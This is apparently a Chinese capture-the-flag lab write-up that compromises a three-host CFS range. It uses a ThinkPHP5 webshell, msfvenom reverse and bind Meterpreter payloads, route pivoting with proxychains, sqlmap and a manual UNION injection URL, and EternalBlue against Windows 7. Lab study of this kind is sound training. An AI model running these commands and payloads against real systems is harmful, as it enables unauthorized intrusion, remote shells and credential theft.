靶场搭建
1、靶场下载
链接:CFS三层靶场环境
提取码:bull
2、网卡配置
先在vmvare虚拟机的虚拟网络编辑器添加两张网卡用来搭建网络环境,我这里直接就是5网卡对应55网段,6网卡对应66网卡,这样容易记住。
然后给虚拟机配置网卡
kali直接桥接
CentOS 7第一张网卡桥接,第二章网卡配置5网卡
Ubuntu配置5,6网卡
Windos 7配置6网卡
3、宝塔设置
在CentOS和Ubuntu这里都有详细信息,宝塔后台登录地址换上自己虚拟机对应的ip即可访问成功
登录上去之后将自己的ip添加进去,win7直接开机就可以了
环境到这里就配置完成了,总结一下所有信息,方便后续操作
kali 192.168.33.181
CentOS 7
root密码:teamssix.com
此主机的IP地址:
192.168.33.244
192.168.55.130
宝塔后台登陆地址及密码:
地址:http://192.168.33.244:8888/a768f109/
账号:eaj3yhsl
密码:41bb8feeUbuntu
root密码:teamssix.com
此主机的IP地址:
192.168.55.131
192.168.66.128
宝塔后台登陆地址及密码:
地址:http://192.168.55.131:8888/2cc52ec0/
账号:xdynr37d
密码:123qwe..win 7
Administrator密码:teamssix.com
此主机的IP地址:192.168.66.129
渗透实操
模仿真实渗透,此时我们知道的信息有
kali的ip为192.168.33.181
CentOS 7的外网ip为192.168.33.244
1、干CentOS 7
1、信息收集
使用nmap扫描CentOS 7的外网ip,查看开放的端口
访问80端口
扫描一下目录,发现robots.txt,访问一下得到一个flag
2、webshell
这是一个ThinkPHP5版本的一个网站,众所周知这个版本的thinkphp存在命令执行漏洞,所以直接上工具一把梭
用蚂剑进行连接,获取第二个flag
通过蚂剑的虚拟终端去查看一下CentOS的网卡信息发现还有一个55网段的内网ip,话不多说,继续干
3、获取主机权限
利用msf生成文件
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.33.181 LPORT=3333 -f elf>1.elf
用蚁剑将生成的1.elf文件上传
然后更改文件权限
msf生成后门
msfconsole #开启msf
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
show options #可以查看一下写的内容
set lhost 192.168.33.181 #ip写kali的
set lport 3333 #监听端口
run #启动
run启动后执行执行文件
shell成功
刚刚发现了还有一个55网段的内网ip,那么接下来就可以从这里进行内网渗透了,话不多说,开干
2、干Ubuntu
1、信息收集
我们已经知道CentOS 7还有55网段的ip,但是用nmap直接扫是扫不出来的,因为这里扫描是用的kali的ip扫描,模拟的环境中kali和centos是公网主机,所以可以直接扫到,而现在扫的属于内网网段,但CentOS即属于公网也属于内网,那就可以用他来渗透内网,这里使用msf自带的探测网络接口的模块(get_local_subnets)和查看路由的模块(autoroute -p)
run get_local_subnets
run autoroute -p
添加55网段的路由
run autoroute -s 192.168.55.0/24 #添加路由
2、msf代理配置
如果想让kali能扫描到55网段还需配置代理,也是利用msf自带的模块
background #保留会话
use auxiliary/server/socks_proxy
set SRVHOST 0.0.0.0
set version 4a
set SRVPORT 2222 #端口可以任意,只要不被占用
run
再进入 /etc/proxychains4.conf 更改代理配置
扫描55网段
proxychains4 nmap -Pn -sT 192.168.55.131
3、webshell
在浏览器配置代理
配置好后,在浏览器上访问
查看页面源码,发现提示了sql注入的地方
访问注入点
sqlmap扫描
proxychains4 sqlmap -u “http://192.168.55.131/index.php?r=vul&keyword=1” --dbs
proxychains4 sqlmap -u “http://192.168.55.131/index.php?r=vul&keyword=1” -p keyword -D bagecms –tables
proxychains4 sqlmap -u “http://192.168.55.131/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin –columns
proxychains4 sqlmap -u “http://192.168.55.131/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin -C username,password –dump
注意:socks代理不稳定,用sqlmap跑就会断开,显示超时
手动注入,发现账号密码
http://192.168.55.131/index.php?r=vul&keyword=1%27%20union%20select%20group_concat(username),group_concat(password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%20from%20bage_admin--+
扫描一下网站下的目录,发现一个文件robots.txt
访问robots.txt,发现后台登录地址
访问后台登录地址
输入刚才破解出来的账号和密码
登录后发现网站使用了很多模块化文件。而且都是php文件格式,我们直接在其中的一个php文件中写入一句话木马,然后用蚁剑连接,注意这里的网址使用的是模块化,不能直接加在网站上,要用?r=模块文件的方式访问模块文件,再用蚁剑连接,注意,因为这里只是靶场,用的都是虚拟机的仅主机模式,所以蚂剑可以直接连接,平时正常情况下是不行的,需要给蚁剑配置kali一样的代理,这里是靶场就不用了
蚁剑连接
发先还有一个66网段的内网ip,继续往下干
4、获取主机权限
目标是66网段,通过它来连接我们是不行的,采取正向连接:
还是msf生成木马,获取shell
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4444 -f elf > 2.elf
从蚁剑将文件上传,并修改权限
msf生成后门
background
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.55.131 #IP为Ubuntu的ip
set LPORT 4444
run
shell成功,继续渗透66网段最后一个主机
3、干win7
1、信息收集
接下来跟之前差不多,获取网络接口,添加路由
run get_local_subnets #获取网络接口
run autoroute -s 192.168.66.0/24 #添加路由信息
run autoroute -p #查看路由信息
扫描66网段
proxychains4 nmap -Pn -sT 192.168.66.129
2、获取主机权限
发现是一台开着445端口的windows,尝试用永恒之蓝,成功拿下
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.66.129
run
然后就可以去寻找flag
cd /
dir /S *flag* /B
# /B 显示文件夹或文件的名字
# /S 显示指定目录和所有子目录中的文件。
# dir /S /B *flag* 这样写也可以
type \Users\Administrator\Desktop\flag.txt
chcp 65001 #解决乱码
至此,靶场已被打穿,下班。
文章如有问题,请私信。